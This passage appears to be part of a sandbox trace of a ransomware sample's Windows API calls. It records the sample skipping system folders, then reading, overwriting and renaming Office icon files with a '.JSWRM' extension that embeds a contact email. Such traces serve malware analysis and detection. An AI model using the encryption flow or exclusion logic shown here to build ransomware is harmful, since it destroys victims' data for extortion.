lpUsedDefaultChar=0x0) returned 5 [0131.915] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.915] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\messageboxerror.ico" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\messageboxerror.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0131.916] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2862) returned 1 [0131.916] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.916] ReadFile (in: hFile=0x314, lpBuffer=0x278330, nNumberOfBytesToRead=0xb20, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e534*=0xb20, lpOverlapped=0x0) returned 1 [0131.918] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.918] WriteFile (in: hFile=0x314, lpBuffer=0x278330*, nNumberOfBytesToWrite=0xb20, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e530*=0xb20, lpOverlapped=0x0) returned 1 [0131.918] CloseHandle (hObject=0x314) returned 1 [0131.919] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\messageboxerror.ico" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\messageboxerror.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\messageboxerror.ico.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\messageboxerror.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.919] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf9a9d821, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf9a9d821, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf9a9d821, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xb2e, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="messageboxinfo.ico", cAlternateFileName="MESSAG~1.ICO")) returned 1 [0131.920] lstrcmpiW (lpString1="messageboxinfo.ico", lpString2=".") returned 1 [0131.920] lstrcmpiW (lpString1="messageboxinfo.ico", lpString2="..") returned 1 [0131.920] lstrcmpiW (lpString1="messageboxinfo.ico", lpString2="...") returned 1 [0131.920] lstrcmpiW (lpString1="messageboxinfo.ico", lpString2="windows") returned -1 [0131.920] lstrcmpiW (lpString1="messageboxinfo.ico", lpString2="recovery") returned -1 [0131.920] lstrcmpiW (lpString1="messageboxinfo.ico", lpString2="perflogs") returned -1 [0131.920] lstrcmpiW (lpString1="messageboxinfo.ico", lpString2="documents and settings") returned 1 [0131.920] lstrcmpiW (lpString1="messageboxinfo.ico", lpString2="$RECYCLE.BIN") returned 1 [0131.920] lstrcmpiW (lpString1="messageboxinfo.ico", lpString2="system volume information") returned -1 [0131.920] lstrcmpiW (lpString1="messageboxinfo.ico", lpString2="msocache") returned -1 [0131.920] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messageboxinfo.ico", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0131.920] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messageboxinfo.ico", cchWideChar=18, lpMultiByteStr=0x241330, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messageboxinfo.ico", lpUsedDefaultChar=0x0) returned 18 [0131.920] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messageboxinfo.ico", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0131.920] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messageboxinfo.ico", cchWideChar=18, lpMultiByteStr=0x240fc0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messageboxinfo.ico", lpUsedDefaultChar=0x0) returned 18 [0131.920] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.920] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.920] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\messageboxinfo.ico" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\messageboxinfo.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0131.921] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2862) returned 1 [0131.921] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.921] ReadFile (in: hFile=0x314, lpBuffer=0x278330, nNumberOfBytesToRead=0xb20, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e534*=0xb20, lpOverlapped=0x0) returned 1 [0131.922] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.923] WriteFile (in: hFile=0x314, lpBuffer=0x278330*, nNumberOfBytesToWrite=0xb20, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e530*=0xb20, lpOverlapped=0x0) returned 1 [0131.923] CloseHandle (hObject=0x314) returned 1 [0131.923] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\messageboxinfo.ico" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\messageboxinfo.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\messageboxinfo.ico.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\messageboxinfo.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.924] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc62081b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc62081b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc646a83, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x9f6, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="ModifiedTelespace.ico", cAlternateFileName="MODIFI~1.ICO")) returned 1 [0131.924] lstrcmpiW (lpString1="ModifiedTelespace.ico", lpString2=".") returned 1 [0131.924] lstrcmpiW (lpString1="ModifiedTelespace.ico", lpString2="..") returned 1 [0131.924] lstrcmpiW (lpString1="ModifiedTelespace.ico", lpString2="...") returned 1 [0131.924] lstrcmpiW (lpString1="ModifiedTelespace.ico", lpString2="windows") returned -1 [0131.924] lstrcmpiW (lpString1="ModifiedTelespace.ico", lpString2="recovery") returned -1 [0131.924] lstrcmpiW (lpString1="ModifiedTelespace.ico", lpString2="perflogs") returned -1 [0131.924] lstrcmpiW (lpString1="ModifiedTelespace.ico", lpString2="documents and settings") returned 1 [0131.924] lstrcmpiW (lpString1="ModifiedTelespace.ico", lpString2="$RECYCLE.BIN") returned 1 [0131.924] lstrcmpiW (lpString1="ModifiedTelespace.ico", lpString2="system volume information") returned -1 [0131.924] lstrcmpiW (lpString1="ModifiedTelespace.ico", lpString2="msocache") returned -1 [0131.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ModifiedTelespace.ico", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0131.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ModifiedTelespace.ico", cchWideChar=21, lpMultiByteStr=0x241268, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ModifiedTelespace.ico", lpUsedDefaultChar=0x0) returned 21 [0131.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ModifiedTelespace.ico", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0131.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ModifiedTelespace.ico", cchWideChar=21, lpMultiByteStr=0x241038, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ModifiedTelespace.ico", lpUsedDefaultChar=0x0) returned 21 [0131.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.924] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\ModifiedTelespace.ico" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\modifiedtelespace.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0131.925] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2550) returned 1 [0131.926] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.926] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x9f0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e534*=0x9f0, lpOverlapped=0x0) returned 1 [0131.927] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.927] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x9f0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e530*=0x9f0, lpOverlapped=0x0) returned 1 [0131.927] CloseHandle (hObject=0x314) returned 1 [0131.928] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\ModifiedTelespace.ico" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\modifiedtelespace.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\ModifiedTelespace.ico.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\modifiedtelespace.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.929] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x86a6c5d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x86a6c5d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x86a6c5d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd6e, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="OFFLINE.ICO", cAlternateFileName="")) returned 1 [0131.929] lstrcmpiW (lpString1="OFFLINE.ICO", lpString2=".") returned 1 [0131.929] lstrcmpiW (lpString1="OFFLINE.ICO", lpString2="..") returned 1 [0131.929] lstrcmpiW (lpString1="OFFLINE.ICO", lpString2="...") returned 1 [0131.929] lstrcmpiW (lpString1="OFFLINE.ICO", lpString2="windows") returned -1 [0131.929] lstrcmpiW (lpString1="OFFLINE.ICO", lpString2="recovery") returned -1 [0131.929] lstrcmpiW (lpString1="OFFLINE.ICO", lpString2="perflogs") returned -1 [0131.929] lstrcmpiW (lpString1="OFFLINE.ICO", lpString2="documents and settings") returned 1 [0131.929] lstrcmpiW (lpString1="OFFLINE.ICO", lpString2="$RECYCLE.BIN") returned 1 [0131.929] lstrcmpiW (lpString1="OFFLINE.ICO", lpString2="system volume information") returned -1 [0131.929] lstrcmpiW (lpString1="OFFLINE.ICO", lpString2="msocache") returned 1 [0131.929] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OFFLINE.ICO", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0131.929] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OFFLINE.ICO", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OFFLINE.ICO", lpUsedDefaultChar=0x0) returned 11 [0131.929] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OFFLINE.ICO", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0131.929] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OFFLINE.ICO", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OFFLINE.ICO", lpUsedDefaultChar=0x0) returned 11 [0131.929] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.929] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.929] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\OFFLINE.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\offline.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0131.930] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=3438) returned 1 [0131.930] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.930] ReadFile (in: hFile=0x314, lpBuffer=0x278330, nNumberOfBytesToRead=0xd60, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e534*=0xd60, lpOverlapped=0x0) returned 1 [0131.932] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.932] WriteFile (in: hFile=0x314, lpBuffer=0x278330*, nNumberOfBytesToWrite=0xd60, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e530*=0xd60, lpOverlapped=0x0) returned 1 [0131.932] CloseHandle (hObject=0x314) returned 1 [0131.932] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\OFFLINE.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\offline.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\OFFLINE.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\offline.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.933] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6e5cc4e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6e5cc4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6e5cc4e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd6e, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="ONLINE.ICO", cAlternateFileName="")) returned 1 [0131.933] lstrcmpiW (lpString1="ONLINE.ICO", lpString2=".") returned 1 [0131.933] lstrcmpiW (lpString1="ONLINE.ICO", lpString2="..") returned 1 [0131.933] lstrcmpiW (lpString1="ONLINE.ICO", lpString2="...") returned 1 [0131.933] lstrcmpiW (lpString1="ONLINE.ICO", lpString2="windows") returned -1 [0131.933] lstrcmpiW (lpString1="ONLINE.ICO", lpString2="recovery") returned -1 [0131.933] lstrcmpiW (lpString1="ONLINE.ICO", lpString2="perflogs") returned -1 [0131.933] lstrcmpiW (lpString1="ONLINE.ICO", lpString2="documents and settings") returned 1 [0131.933] lstrcmpiW (lpString1="ONLINE.ICO", lpString2="$RECYCLE.BIN") returned 1 [0131.933] lstrcmpiW (lpString1="ONLINE.ICO", lpString2="system volume information") returned -1 [0131.933] lstrcmpiW (lpString1="ONLINE.ICO", lpString2="msocache") returned 1 [0131.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONLINE.ICO", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0131.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONLINE.ICO", cchWideChar=10, lpMultiByteStr=0x345e870, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONLINE.ICO", lpUsedDefaultChar=0x0) returned 10 [0131.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONLINE.ICO", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0131.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONLINE.ICO", cchWideChar=10, lpMultiByteStr=0x345e840, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONLINE.ICO", lpUsedDefaultChar=0x0) returned 10 [0131.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.934] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\ONLINE.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\online.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0131.934] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=3438) returned 1 [0131.934] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.934] ReadFile (in: hFile=0x314, lpBuffer=0x278330, nNumberOfBytesToRead=0xd60, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e534*=0xd60, lpOverlapped=0x0) returned 1 [0131.936] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.936] WriteFile (in: hFile=0x314, lpBuffer=0x278330*, nNumberOfBytesToWrite=0xd60, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e530*=0xd60, lpOverlapped=0x0) returned 1 [0131.936] CloseHandle (hObject=0x314) returned 1 [0131.936] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\ONLINE.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\online.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\ONLINE.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\online.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.937] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x2fed144, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2fed144, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2fed144, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd6e, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="OnLineBusy.ico", cAlternateFileName="ONLINE~2.ICO")) returned 1 [0131.937] lstrcmpiW (lpString1="OnLineBusy.ico", lpString2=".") returned 1 [0131.937] lstrcmpiW (lpString1="OnLineBusy.ico", lpString2="..") returned 1 [0131.937] lstrcmpiW (lpString1="OnLineBusy.ico", lpString2="...") returned 1 [0131.937] lstrcmpiW (lpString1="OnLineBusy.ico", lpString2="windows") returned -1 [0131.937] lstrcmpiW (lpString1="OnLineBusy.ico", lpString2="recovery") returned -1 [0131.938] lstrcmpiW (lpString1="OnLineBusy.ico", lpString2="perflogs") returned -1 [0131.938] lstrcmpiW (lpString1="OnLineBusy.ico", lpString2="documents and settings") returned 1 [0131.938] lstrcmpiW (lpString1="OnLineBusy.ico", lpString2="$RECYCLE.BIN") returned 1 [0131.938] lstrcmpiW (lpString1="OnLineBusy.ico", lpString2="system volume information") returned -1 [0131.938] lstrcmpiW (lpString1="OnLineBusy.ico", lpString2="msocache") returned 1 [0131.938] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OnLineBusy.ico", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0131.938] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OnLineBusy.ico", cchWideChar=14, lpMultiByteStr=0x345e870, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OnLineBusy.ico", lpUsedDefaultChar=0x0) returned 14 [0131.938] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OnLineBusy.ico", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0131.938] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OnLineBusy.ico", cchWideChar=14, lpMultiByteStr=0x345e840, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OnLineBusy.ico", lpUsedDefaultChar=0x0) returned 14 [0131.938] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.938] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.938] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\OnLineBusy.ico" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\onlinebusy.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0131.939] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=3438) returned 1 [0131.939] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.939] ReadFile (in: hFile=0x314, lpBuffer=0x278330, nNumberOfBytesToRead=0xd60, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e534*=0xd60, lpOverlapped=0x0) returned 1 [0131.966] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.966] WriteFile (in: hFile=0x314, lpBuffer=0x278330*, nNumberOfBytesToWrite=0xd60, lpNumberOfBytesWritten=0x345e530, 